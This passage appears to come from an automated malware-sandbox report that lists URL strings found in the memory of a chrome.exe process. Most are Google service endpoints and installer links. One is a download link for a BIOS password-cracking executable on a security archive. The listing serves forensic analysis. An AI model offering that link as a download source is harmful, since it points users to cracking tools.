Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000008.00000002.2129590881.000009B400094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401AE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://alldrivers4devices.net/
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beastacademy.com/checkout/cart
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140798316.000009B4016E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: chrome.exe, 00000008.00000003.972811086.000009B400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cart.ebay.com/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cart.godaddy.com/go/checkout
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: chrome.exe, 00000008.00000003.972919073.000009B40155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.967814195.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972505265.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000008.00000002.2141189608.000009B401798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129354417.000009B400014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134871796.000009B400C48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000008.00000003.969433122.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972919073.000009B40155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.967814195.000009B400A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972505265.000009B400A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000008.00000003.941582877.000009B000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.941682019.000009B00053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.943642984.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.944001625.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2128965650.000009B000654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000008.00000003.941582877.000009B000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.941682019.000009B00053C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_
Source: chrome.exe, 00000008.00000003.941582877.000009B000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.941682019.000009B00053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.943642984.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.944001625.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2128965650.000009B000654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000008.00000003.943642984.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.944001625.000009B000650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2128965650.000009B000654000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000008.00000003.941582877.000009B000534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.941682019.000009B00053C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_
Source: chrome.exe, 00000008.00000003.941328351.000009B000514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2129067438.000009B000698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000008.00000003.952900184.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985381985.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1712409873.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000008.00000003.934888984.00007CD8000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.934920185.00007CD8000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000008.00000003.952900184.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985381985.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1712409873.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1110933299.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1270303469.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137958094.000009B40116C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969800499.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1323174553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2131201643.000009B4003B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130454553.000009B40023C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000008.00000002.2130656769.000009B40026C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140458716.000009B401545000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Source: chrome.exe, 00000008.00000002.2129500920.000009B400060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2142068049.000009B401A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143295182.000009B401FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140422019.000009B401538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/clientupdate-aus/1
Source: chrome.exe, 00000008.00000002.2130868192.000009B400340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkih
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acowdfe2t76yuidsex3ifs6nk3da_20241026.690810062.14/o
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/actfcfanl4hq5aaxnnweccjxua6q_2024.11.6.1/jflhchccmpp
Source: chrome.exe, 00000008.00000002.2132716182.000009B400814000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanlea
Source: chrome.exe, 00000008.00000002.2129755685.000009B4000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/cvde376f6tyxybuonyzcqfilye_2024.10.30.0/niikhdgajlph
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/cxxqn654fg7hzrcrrnqcniqqye_2024.10.11.1/kiabhabjdbkj
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/gonpemdgkjcec
Source: chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/p2zbkxfgkqyr6ljey2oe3bnzoy_2023.11.29.1201/ggkkehgbn
Source: chrome.exe, 00000008.00000002.2136867640.000009B400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138916816.000009B4012F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137474127.000009B4010C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: chrome.exe, 00000008.00000002.2131960348.000009B400688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139410870.000009B4013A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000008.00000003.1000143016.000009B401C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999704489.000009B401C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.999615366.000009B401C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137289557.000009B40107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/p
Source: chrome.exe, 00000008.00000002.2138795443.000009B4012BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2132075731.000009B4006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2130129822.000009B400178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000008.00000002.2138795443.000009B4012BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2130129822.000009B400178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132075731.000009B4006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135604038.000009B400DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130129822.000009B400178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2132114432.000009B400728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000008.00000002.2131997954.000009B400698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2134562051.000009B400BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137098219.000009B401014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135014565.000009B400C9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134978060.000009B400C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: chrome.exe, 00000008.00000003.973089654.000009B401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972745244.000009B4004F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.972963112.000009B400544000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138020397.000009B40118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2135770117.000009B400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2138838858.000009B4012CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000008.00000002.2138020397.000009B40118C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2torcs
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
